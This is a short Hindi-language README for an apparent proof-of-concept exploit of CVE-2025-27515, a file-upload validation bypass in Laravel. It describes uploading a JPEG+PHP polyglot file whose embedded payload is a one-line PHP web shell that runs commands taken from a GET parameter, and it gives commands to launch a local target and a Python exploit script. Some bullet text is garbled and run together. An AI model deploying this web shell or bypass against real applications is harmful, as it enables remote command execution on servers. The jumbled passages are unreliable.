
CVE-2025-27515 का PoC
CVE-2025-27515 का एक व्यावहारिक प्रदर्शन, जो Laravel Framework (≤ 12.0.0) में फ़ाइल अपलोड सत्यापन बाइपास भेद्यता है।
CVE-2025-27515 एक सत्यापन बाइपास है जो हमलावरों को फ़ाइल अपलोड प्रतिबंधों को दरकिनार करने की अनुमति देता है जब Laravel अनुप्रयोग वाइल्डकार्ड सत्यापन पैटर्न (files.*) का उपयोग करते हैं। यह भेद्यता Laravel द्वारा ऐरे-आधारित फ़ाइल अपलोड को संसाधित करने के तरीके की कमजोरियों का फायदा उठाकर दुर्भावनापूर्ण फ़ाइलों को अपलोड करने में सक्षम बनाती है।
गंभीरता: मध्यम/उच्च
CWE: CWE-20 (अनुचित इनपुट सत्यापन)
यह एक्सप्लॉइट एक पॉलीग्लॉट JPEG+PHP फ़ाइल का उपयोग करता है जो:
FF D8 FF E0) शामिल करती है<?php system($_GET['cmd']); ?>) शामिल करती है.jpg एक्सटेंशन का उपयोग करती हैphp artisan serve
# Access at http://localhost:8000/upload
Python संस्करण:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए
Guaxinim द्वारा | साइबर सुरक्षा अनुसंधान